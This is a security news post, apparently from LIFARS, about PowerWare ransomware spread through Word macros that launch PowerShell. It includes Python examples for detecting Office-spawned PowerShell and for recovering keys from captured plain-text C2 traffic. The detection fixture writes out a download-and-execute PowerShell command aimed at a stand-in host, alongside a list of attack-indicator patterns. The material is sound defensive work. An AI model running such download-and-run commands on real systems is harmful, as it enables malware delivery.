March 30, 2016 by

Cybercriminals Are Using Microsoft PowerShell to Create Ransomware

Cybercriminals are targeting healthcare organizations, hospitals and other enterprises with a strain of ransomware written in PowerShell, Microsoft's scripting language for system administration.

Security researchers at Carbon Black have discovered a strain of PowerShell-based ransomware that was used in an attack on a healthcare organization. The email phishing campaign that delivered it was unsuccessful.

Dubbed 'PowerWare' by the researchers, the newly discovered strain reaches its victims as a macro-enabled Microsoft Word document.

Because PowerShell is used both to fetch and to execute the malicious code, the infection drops no new executable on disk. The malicious logic instead runs inside PowerShell, a legitimate system component, so it blends in with normal administrative activity and is harder to detect.

Conventional ransomware variants install malicious files on the system, and defenders have become better at spotting those files. PowerWare's approach sidesteps that file-based detection.

While the code itself is relatively simple, the researchers found that PowerWare takes a novel approach for ransomware.

The researchers found that PowerWare is delivered through a macro-enabled Microsoft Word document. When the macro runs, it launches two instances of PowerShell.

One instance downloads the ransomware script; the other takes that script as input and executes it to encrypt files on the targeted system. This split supports the view that malware authors are thinking outside the box to make their products harder to detect and kill. From that point on, the strain behaves like any other ransomware, demanding payment in return for the decryption key that releases the files.
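The delivery chain above (Office document, macro, PowerShell instances that download and then run a script) is visible in process-creation telemetry even though no new executable is dropped. The following is an added detection example, not code from Carbon Black, LIFARS or the PowerWare sample: it walks each PowerShell process's parent chain looking for an Office application and scores the command line against download-and-execute indicators. The record fields (pid, ppid, image, cmdline), the sample events and the command lines are constructed for this example, modelled on the chain the article describes rather than copied from real telemetry.

```python
"""Flag PowerShell spawned from an Office document in process-creation telemetry.

Added example, not Carbon Black's or LIFARS's code. The records below are a
constructed, simplified form of process-creation events (Sysmon Event ID 1
style); the field names pid, ppid, image and cmdline are assumptions for this
example, and the command lines are modelled on the chain described in the
article, not copied from a real PowerWare sample.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Each pattern is one indicator; a hit needs several so that ordinary admin
# scripts launched from an interactive session do not trip the rule.
SUSPICIOUS = [
    re.compile(r"downloadfile|downloadstring", re.I),      # fetch a payload
    re.compile(r"-(executionpolicy|ep)\s+bypass", re.I),   # ignore script policy
    re.compile(r"-(noprofile|nop)\b", re.I),               # skip profile, quieter start
    re.compile(r"\biex\b|invoke-expression", re.I),        # run downloaded text
    re.compile(r"-file\s+\S*temp\S*", re.I),               # script staged under a temp dir
]

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed telemetry, not a real capture
    {"pid": 4120, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /K powershell.exe -ExecutionPolicy Bypass -noprofile -c <download> ; "
                r"powershell.exe -ExecutionPolicy Bypass -noprofile -file %TEMP%\y.ps1"},
    # First PowerShell instance: downloads the script
    {"pid": 4201, "ppid": 4188, "image": PS_EXE,
     "cmdline": r'''powershell.exe -ExecutionPolicy Bypass -noprofile -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.php','%TEMP%\y.ps1')"'''},
    # Second PowerShell instance: runs the downloaded script
    {"pid": 4210, "ppid": 4188, "image": PS_EXE,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -noprofile -file C:\Users\alice\AppData\Local\Temp\y.ps1"},
    # Benign: an administrator running a backup script from an explorer-launched session
    {"pid": 5000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5010, "ppid": 5000, "image": PS_EXE,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -noprofile -file C:\Scripts\backup.ps1"},
]


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(event, by_pid, max_depth=8):
    """Walk the parent chain and return the first Office process found, if any."""
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return None
        if _basename(cur["image"]) in OFFICE_APPS:
            return cur
    return None


def find_office_spawned_powershell(events, min_score=2):
    """Return PowerShell processes descended from an Office app whose command
    line matches at least min_score of the SUSPICIOUS indicators."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) != "powershell.exe":
            continue
        ancestor = office_ancestor(e, by_pid)
        if ancestor is None:
            continue  # the benign admin script above stops here
        matched = [p.pattern for p in SUSPICIOUS if p.search(e["cmdline"])]
        if len(matched) >= min_score:
            hits.append({"pid": e["pid"], "office_parent": _basename(ancestor["image"]),
                         "score": len(matched), "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in find_office_spawned_powershell(SAMPLE_EVENTS):
        print(hit)
```

The rule keys on ancestry rather than on the immediate parent because the macro may go through cmd.exe (as in the constructed sample) or another intermediate before PowerShell starts; the indicator score keeps a lone `-ExecutionPolicy Bypass` from an administrator's console out of the alert queue.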

In this case, PowerWare initially demands a ransom of $500. If it goes unpaid after two weeks, the demand increases to $1,000.

Carbon Black's researchers also reported that organizations with full packet capture in place can recover the encryption keys.

PowerWare talks to its command-and-control servers over a plain-text protocol, so the traffic, including the key it sends, can be observed on the wire.

An organization would then only need to identify the right domain and IP range in the captured traffic to retrieve the encryption key, which makes recovery far simpler. The capture must already be running when the infection occurs, since the key is sent at that point and is not retransmitted later.
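The recovery step above, extracting the key from captured plain-text C2 traffic once the C2 domain or IP range is known, as an added example that is not code from Carbon Black or LIFARS. It assumes the capture has been reduced to one record per HTTP request (source and destination IP plus the raw request text); the hosts, addresses, URL paths, form field names and key values are all constructed for the example, and the test for what "looks like a key" is a heuristic on AES key lengths, not a description of PowerWare's actual protocol.

```python
"""Recover candidate encryption keys from captured plain-text C2 traffic.

Added example, not code from Carbon Black or LIFARS. Assumes the packet
capture has been reduced to one record per HTTP request (src/dst IP plus the
raw request) and that the C2 domain(s) and IP range(s) are already known.
Hosts, addresses, paths, field names and keys below are constructed.
"""
import base64
import ipaddress
import re
from urllib.parse import parse_qs, quote

AES_KEY_LENGTHS = {16, 24, 32}           # AES-128/192/256 key sizes in bytes
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed C2 indicators: a reserved .invalid name and a TEST-NET range
C2_DOMAINS = {"update.example.invalid"}
C2_RANGES = [ipaddress.ip_network("203.0.113.0/24")]


def _http_post(host, path, body):
    """Build a raw HTTP/1.1 POST as it would appear in a capture (constructed)."""
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


_B64_KEY = base64.b64encode(bytes(range(32))).decode()  # constructed 32-byte key

CAPTURED = [  # constructed records, not real PowerWare traffic
    {"src": "10.10.4.21", "dst": "203.0.113.45",
     "data": _http_post("update.example.invalid", "/gate.php",
                        f"id=9b2e-4c1a&key={quote(_B64_KEY)}&ext=.locked")},
    {"src": "10.10.4.21", "dst": "198.51.100.7",      # unrelated browsing
     "data": "GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"},
    {"src": "10.10.7.9", "dst": "203.0.113.46",       # matched by IP range only
     "data": _http_post("cdn.example.invalid", "/gate.php",
                        "id=0c77-91fe&key=00112233445566778899aabbccddeeff")},
    {"src": "10.10.7.9", "dst": "203.0.113.46",       # C2 check-in without a key
     "data": _http_post("cdn.example.invalid", "/gate.php", "id=0c77-91fe&status=done")},
]


def _key_bytes(value):
    """Heuristic: (encoding, raw) if value decodes to an AES-sized key, else None."""
    if HEX_RE.match(value) and len(value) % 2 == 0 and len(value) // 2 in AES_KEY_LENGTHS:
        return "hex", bytes.fromhex(value)
    if B64_RE.match(value) and len(value) % 4 == 0:
        try:
            raw = base64.b64decode(value, validate=True)
        except ValueError:
            return None
        if len(raw) in AES_KEY_LENGTHS:
            return "base64", raw
    return None


def _parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def _to_c2(dst_ip, host, domains, ranges):
    """True if the request went to a known C2 domain or into a known C2 IP range."""
    if host in domains:
        return True
    addr = ipaddress.ip_address(dst_ip)
    return any(addr in net for net in ranges)


def recover_keys(records, domains=C2_DOMAINS, ranges=C2_RANGES):
    """Return key candidates found in POST bodies sent to the C2, per victim."""
    found = []
    for rec in records:
        method, path, headers, body = _parse_request(rec["data"])
        host = headers.get("host", "")
        if method != "POST" or not _to_c2(rec["dst"], host, domains, ranges):
            continue
        for field, values in parse_qs(body).items():
            for value in values:
                hit = _key_bytes(value)
                if hit:
                    encoding, raw = hit
                    found.append({"victim": rec["src"], "c2": host or rec["dst"], "path": path,
                                  "field": field, "encoding": encoding, "key_hex": raw.hex()})
    return found


if __name__ == "__main__":
    for candidate in recover_keys(CAPTURED):
        print(candidate)
```

Filtering on both the domain and the IP range matters: the third record in the constructed capture uses a different host name for the same C2 infrastructure and is only caught by the range check. Candidates are keyed by victim IP so that each host's files can be matched to the key its own infection sent.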

Image credit: imgur

About the author


LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients' engagement experience while providing a strategic and integrated array of services to minimize risk and disruption while protecting your brand.
